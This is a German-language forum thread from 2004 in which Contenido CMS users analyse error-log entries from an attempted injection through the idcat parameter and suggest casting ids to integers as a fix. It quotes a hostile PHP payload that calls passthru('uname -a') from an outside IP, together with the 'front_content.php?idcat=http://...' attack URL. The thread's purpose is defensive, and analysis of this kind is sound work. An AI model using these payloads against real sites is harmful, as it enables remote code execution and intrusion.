Seite 1 von 1

hack attacke ?

Verfasst: Do 8. Jul 2004, 07:36
von emergence
ähm hab gerade folgendes in einem errorlog.txt bei mir angefunden...
ne idee wie ich das werten soll ?

da gibts ne nette url -> http://217.59.104.226/ dort finde ich

<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>

hier der komplette auszug...
[02-Jul-2004 18:49:43] MySQL-Error: Duplicate entry '392' for key 1 (1062)
[02-Jul-2004 18:49:43] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('resultate','&190=1',1,392)
[02-Jul-2004 18:49:43] MySQL-Error: Duplicate entry '389' for key 1 (1062)
[02-Jul-2004 18:49:43] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('woche','&190=1',1,389)
idclient = 'http://217.5 (1064)
[24-Jun-2004 22:57:20] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://217.59.104.226/ AND
[24-Jun-2004 22:57:20] next_record called with no query pending.
idclient = 'http://217.5 (1064)
[24-Jun-2004 22:57:20] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://217.59.104.226/ AND
idtree
ORDER BY
idclient = 'http://217.59.104.226/'
B.parentid = http://217.59.104.226/ AND
A.idcat = B.idcat AND
WHERE
con_cat AS B
con_cat_tree AS A,
FROM
A.idcat AS idcat
[24-Jun-2004 22:57:20] Invalid SQL: SELECT
[23-Jun-2004 17:23:29] MySQL-Error: Duplicate entry '376' for key 1 (1062)
[23-Jun-2004 17:23:29] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('marin','&188=1',1,376)
[23-Jun-2004 10:55:58] MySQL-Error: Duplicate entry '374' for key 1 (1062)
[23-Jun-2004 10:55:58] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('bungsleiterinjahrgang','&93=1',1,374)
[21-Jun-2004 18:32:48] MySQL-Error: Duplicate entry '365' for key 1 (1062)
[21-Jun-2004 18:32:48] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('chste','&117=1',1,365)
[21-Jun-2004 18:24:48] MySQL-Error: Duplicate entry '360' for key 1 (1062)
[21-Jun-2004 18:24:48] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('binge','&184=1',1,360)
[21-Jun-2004 18:22:58] MySQL-Error: Duplicate entry '356' for key 1 (1062)
[21-Jun-2004 18:22:58] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('binge','&184=1',1,356)
[21-Jun-2004 18:22:58] MySQL-Error: Duplicate entry '355' for key 1 (1062)
[21-Jun-2004 18:22:58] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('ehrentitel','&184=1',1,355)
[21-Jun-2004 18:22:58] MySQL-Error: Duplicate entry '353' for key 1 (1062)
[21-Jun-2004 18:22:58] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('gakkushi','&184=1',1,353)
[21-Jun-2004 18:22:58] MySQL-Error: Duplicate entry '349' for key 1 (1062)
[21-Jun-2004 18:22:58] Invalid SQL: INSERT INTO con_keywords (keyword,auto,idlang, idkeyword) VALUES ('rechts','&184=1',1,349)
(1064)
idclient = 'http://asap'
[20-Jun-2004 10:50:51] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://asap AND
[20-Jun-2004 10:50:51] next_record called with no query pending.
(1064)
idclient = 'http://asap'
[20-Jun-2004 10:50:51] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://asap AND
idtree
ORDER BY
idclient = 'http://asap'
B.parentid = http://asap AND
A.idcat = B.idcat AND
WHERE
con_cat AS B
con_cat_tree AS A,
FROM
A.idcat AS idcat
[20-Jun-2004 10:50:51] Invalid SQL: SELECT
(1064)
idclient = 'http://asap'
[20-Jun-2004 10:08:40] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://asap AND
[20-Jun-2004 10:08:40] next_record called with no query pending.
(1064)
idclient = 'http://asap'
[20-Jun-2004 10:08:40] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://asap AND
idtree
ORDER BY
idclient = 'http://asap'
B.parentid = http://asap AND
A.idcat = B.idcat AND
WHERE
con_cat AS B
con_cat_tree AS A,
FROM
A.idcat AS idcat
[20-Jun-2004 10:08:40] Invalid SQL: SELECT

Verfasst: Do 8. Jul 2004, 09:47
von timo
Da hat wohl einer eine SQL-Injection versucht, aber das sieht mir eher nach einem automatischen Script aus ...

Verfasst: Do 8. Jul 2004, 10:06
von emergence
ich sehe mir das mal genauer an...

Verfasst: Do 8. Jul 2004, 12:11
von emergence
ähm jetzt mal so nebenbei...

wenn ich mir das errorlog.txt ansehe ist das ja rückwärts aufgelistet...
nach jedem linebreak spring er in die zeile darüber ?

in der include.system_sysvalues.php

findet sich

Code: Alles auswählen

$upgErrorLogBuffer = fgets($upgErrorLogHandle, 16384) . $upgErrorLogBuffer;
sollte das nicht
$upgErrorLogBuffer.= fgets($upgErrorLogHandle, 16384);
sein ?

sprich so wie es mal in der 4.4.x serie war ?

Verfasst: Do 8. Jul 2004, 12:41
von emergence
ähm ich hab jetzt mal den einstiegspunkt gefunden...

CVS_HEAD front_content.php

der komiker hat einfach nur diese zeile in die leiste reingeschrieben...

front_content.php?idcat=http://217.59.104.226/

die errorlog.txt bringt dann folgenden eintrag: (ich habs jetzt mal mit http://testme) gemacht...

[08-Jul-2004 13:33:36] Invalid SQL: SELECT
A.idcat AS idcat
FROM
con_cat_tree AS A,
con_cat AS B
WHERE
A.idcat = B.idcat AND
B.parentid = http://testme AND
idclient = '1'
ORDER BY
idtree
[08-Jul-2004 13:33:36] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://testme AND
idclient = '1'
ORDER (1064)
[08-Jul-2004 13:33:36] next_record called with no query pending.
[08-Jul-2004 13:33:36] MySQL-Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '://testme AND
idclient = '1'
ORDER (1064)

ähm selbe betrifft ebenso idart...

vielleicht sollte man ne überprüfung einbauen das idart, idcat, idcatart nur eine int wert sein darf...

und irgendwie komme ich zu dem schluss das es jemand ist der contenido kennt...
die variable $client kann man nur ändern wenn man sich changeclient bedient...

Verfasst: Do 8. Jul 2004, 16:34
von Darth-Vader
emergence hat geschrieben: vielleicht sollte man ne überprüfung einbauen das idart, idcat, idcatart nur eine int wert sein darf...

und irgendwie komme ich zu dem schluss das es jemand ist der contenido kennt...

(harmloses) Beispiel: $idart = (int) getVar("idart")

extremer wäre es halt mit regex ;)





dazu kann ich nur sagen:

"hm, du wirst dich wundern wieviel Leute nach dem Installieren vergessen den Setup-Ordner zu löschen oder neben dem Passwort vom User "admin" auch das Passwort von "sysadmin" zu ändern!" ;) :idea:

Verfasst: Do 8. Jul 2004, 16:59
von timo
geht auch einfacher:

$idcat = intval($idcat);

allerdings sollte diese Prüfung mal eine Kategorieklasse zentral lösen, weil schon alleine für die idcat dürften sich mehrere 100 Stellen finden, wo man das ändern muß...